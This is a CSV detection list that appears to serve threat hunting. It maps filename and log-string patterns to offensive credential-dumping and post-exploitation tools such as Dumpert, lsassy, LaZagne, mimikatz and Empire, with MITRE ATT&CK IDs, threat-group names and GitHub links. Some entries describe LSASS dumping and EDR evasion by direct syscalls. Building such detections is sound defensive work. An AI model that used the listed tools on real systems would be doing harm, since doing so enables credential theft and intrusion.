"*DumpAADSyncCreds.csproj*",".{0,1000}DumpAADSyncCreds\.csproj.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","41653"
"*DumpAADSyncCreds.exe*",".{0,1000}DumpAADSyncCreds\.exe.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","41654"
"*DumpAADSyncCreds.sln*",".{0,1000}DumpAADSyncCreds\.sln.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","41655"
"*--dump-bitlocker*--ntds-file *",".{0,1000}\-\-dump\-bitlocker.{0,1000}\-\-ntds\-file\s.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","41656"
"*DumpBrowserHistory*",".{0,1000}DumpBrowserHistory.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","41657"
"*DumpChromePasswords.ps1*",".{0,1000}DumpChromePasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","41659"
"*DumpCreds*",".{0,1000}DumpCreds.{0,1000}","offensive_tool_keyword","DumpCreds","Dumpcreds is a tool that may be used to extract various credentials from running processes. I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit","T1055 - T1003 - T1216 - T1002 - T1552","TA0002 - TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/ponypot/dumpcreds","1","1","N/A","N/A","N/A","1","6","1","2019-10-08T07:26:31Z","2017-10-10T12:57:42Z","41660"
"*-DumpCreds*",".{0,1000}\-DumpCreds.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","41661"
"*dumpcreds*mimipenguin*",".{0,1000}dumpcreds.{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","41662"
"*dumpCredStore.ps1*",".{0,1000}dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41663"
"*Dumped LSASS memory to *",".{0,1000}Dumped\sLSASS\smemory\sto\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","41665"
"*Dumpert by Outflank*",".{0,1000}Dumpert\sby\sOutflank.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41666"
"*Dumpert.bin*",".{0,1000}Dumpert\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41667"
"*dumpert.dmp*",".{0,1000}dumpert\.dmp.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41668"
"*Dumpert.exe*",".{0,1000}Dumpert\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41669"
"*Dumpert.exe*",".{0,1000}Dumpert\.exe.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41670"
"*Dumpert.git*",".{0,1000}Dumpert\.git.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41671"
"*dumpert.py*",".{0,1000}dumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41672"
"*dumpert_path=*",".{0,1000}dumpert_path\=.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41673"
"*Dumpert-Aggressor*",".{0,1000}Dumpert\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41674"
"*Dumpert-Aggressor*",".{0,1000}Dumpert\-Aggressor.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41675"
"*dumpertdll*",".{0,1000}dumpertdll.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41676"
"*Dumpert-DLL*",".{0,1000}Dumpert\-DLL.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41677"
"*dumpertdll.py*",".{0,1000}dumpertdll\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41678"
"*-DumpForest *",".{0,1000}\-DumpForest\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41679"
"*Dumping cached domain logon information *",".{0,1000}Dumping\scached\sdomain\slogon\sinformation\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","41680"
"*Dumping Domain Credentials (*",".{0,1000}Dumping\sDomain\sCredentials\s\(.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","41681"
"*Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot*",".{0,1000}Dumping\sLSASS\smemory\swith\sMiniDumpWriteDump\son\sPssCaptureSnapShot.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#content","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","41682"
"*dumping passwords from %s (pid:*",".{0,1000}dumping\spasswords\sfrom\s\%s\s\(pid\:.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#content","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","41683"
"*DumpKernel-S1.ps1*",".{0,1000}DumpKernel\-S1\.ps1.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","41684"
"*dumplsass*",".{0,1000}dumplsass.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41685"
"*DumpLSASS-main.zip*",".{0,1000}DumpLSASS\-main\.zip.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","1","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","41686"
"*dumpmethod.dumpert*",".{0,1000}dumpmethod\.dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41687"
"*DumpNParse-main.zip*",".{0,1000}DumpNParse\-main\.zip.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","1","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","41688"
"*dumpntlm.py*",".{0,1000}dumpntlm\.py.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","41689"
"*DumpNTLMInfo.py*",".{0,1000}DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","1","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","41690"
"*DumpNTLMInfo.py*",".{0,1000}DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41691"
"*DumpPEFromMemory.cpp*",".{0,1000}DumpPEFromMemory\.cpp.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","41692"
"*DumpPEFromMemory.exe*",".{0,1000}DumpPEFromMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","41693"
